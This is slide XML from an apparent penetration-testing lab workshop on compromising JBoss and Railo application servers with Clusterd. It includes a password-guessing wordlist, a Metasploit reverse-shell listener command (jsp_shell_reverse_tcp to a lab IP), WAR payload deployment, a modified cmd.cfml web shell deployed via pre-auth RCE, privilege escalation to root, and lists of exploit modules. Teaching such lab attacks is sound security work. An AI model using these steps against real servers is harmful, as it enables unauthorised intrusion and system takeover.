              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Attack Surface</a:t>
            </a:r>
          </a:p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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hands-On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lab Setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JBOSS Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tomcat/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Solution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315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JBOSS 7.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fear, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lusterd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has a brute force module. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lets guess the username is JBOSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lets start with a wordlist of basic passwords (feel free to use your own)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>12345</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jboss</a:t>
            </a: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42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Now we are able to brute force the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and run the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-info module: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62438" r="41068"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="444151" y="3735220"/>
            <a:ext cx="8331897" cy="17511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934" y="2666999"/>
            <a:ext cx="7420330" cy="60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11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We need a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to attack this server, lets see what is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can add the “-a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” flag to limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> list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481" y="3124200"/>
            <a:ext cx="7295238" cy="2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433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Getting closer, time to generate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>payload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Output gives us the MSF payload, and output file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shell.war</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”. 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52" y="1903020"/>
            <a:ext cx="8086308" cy="3028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52" y="4441671"/>
            <a:ext cx="8086308" cy="72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74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We need a listener, to catch our shell with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msfcli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multi/handler payload=java/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jsp_shell_reverse_tcp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LHOST=192.168.242.133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LPORT=4444 E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Replace LHOST/LPORT respectively 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22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Deployment successful!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33" y="2490990"/>
            <a:ext cx="8452767" cy="230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3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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1119934"/>
            <a:ext cx="5943600" cy="708866"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shell opens on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> user, who has full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to root, and then list to see our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MD5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="28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600" y="3352800"/>
            <a:ext cx="8171998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4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196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7452360" cy="6397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 smtClean="0"/>
              <a:t>Clusterd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> fingerprints </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 4.2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2620990"/>
            <a:ext cx="8223984" cy="118901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7588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7452360" cy="6397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 smtClean="0"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, like later JBOSS versions, requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth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80999" y="2276203"/>
            <a:ext cx="8475645" cy="305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59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do anything stupid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Get permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know the law(s) for your area, consult with legal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6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219200"/>
            <a:ext cx="8229600" cy="4724082"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has a pre-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> which allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Clusterd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to retrieve the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Versions older than 4.1 can get the password in clear text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We have version 4.2, which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Clusterd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can pull the salted SHA256, but we can’t as easily decrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can brute force as we did with Target 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There may be a gift in target 2’s HTML source on port 80…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346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001000" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why brute force? We have pre-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> RCE!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check the blog posts cited on the earlier RAILO slide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534450"/>
            <a:ext cx="7999660" cy="103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343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295400"/>
            <a:ext cx="8229600" cy="4647882"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Copy and modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>clusterd’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cfml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (or use your own)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Saved in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/lib/resources/cmd.cfml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replace cmd.exe with /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replace /c with -c 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7455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371600"/>
            <a:ext cx="8153400" cy="4571682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will use: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>deploy /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cmd.cfml </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your custom .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cfml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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thumbnail_inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, which will exploit pre-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eth1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Optional, if you have more than one interface, specify which to serve your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cfml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from. 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8324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371600"/>
            <a:ext cx="8153400" cy="4571682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We see we deployed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-context/cmd.cfml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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047" y="2600657"/>
            <a:ext cx="7561905" cy="2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8751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371600"/>
            <a:ext cx="8153400" cy="4571682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsing to that page, we can execute commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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i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US" dirty="0" smtClean="0"/>
              <a:t> reveals we are the root user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr 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-1" b="13732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="449686" y="3124200"/>
            <a:ext cx="7627513" cy="278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433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371600"/>
            <a:ext cx="8153400" cy="4571682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsing to that page, we can execute commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i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 /root” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> reveals our MD5 flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr 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124200"/>
            <a:ext cx="8578234" cy="281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016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028" y="1485900"/>
            <a:ext cx="2868706" cy="16764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5014" y="178197"/>
            <a:ext cx="7772400" cy="548640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Servers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80" y="1066800"/>
            <a:ext cx="2642202" cy="26294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31" y="4343400"/>
            <a:ext cx="2120900" cy="1219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191" y="1601130"/>
            <a:ext cx="2286000" cy="12290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229" y="4061223"/>
            <a:ext cx="2871490" cy="10441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380" y="3173612"/>
            <a:ext cx="2819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3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NMAP does some…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077200" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http-adobe-coldfusion-apsa1301.nse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>coldfusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subzero.nse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>weblogic-t3-info.nse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http-axis2-dir-traversal.nse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Clusterd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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42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5334000" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> does some…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077200" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Java Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>DeploymentFileRepository</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> WAR deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> JMX Console </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Upload and Execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> JMX Console </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Beanshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> WAR upload and deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>DeploymentFileRepository</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> WAR Deployment (via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>JMXInvokerServlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Apache Tomcat Manager Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Authenticated Code Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Apache Tomcat Manager - Application Upload Authenticated Code Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>ColdFusion 8.0.1 - Arbitrary File Upload and Execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Adobe ColdFusion - Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Adobe ColdFusion APSB13-03 Remote Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Adobe ColdFusion 9 - Administrative Login Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>BEA WebLogic JSESSIONID Cookie Value Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>BEA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Transfer-Encoding Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Oracle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Apache Connector POST Request Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Axis2 Authenticated Code Execution (via REST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Axis2 / SAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>BusinessObjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Authenticated Code Execution (via SOAP)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Clusterd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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9582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639762"/>
          </a:xfrm>
        </p:spPr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offers much more…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/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JBoss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRP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Versions 3.x - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Currently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>supported </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jmx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-console/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MainDeployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
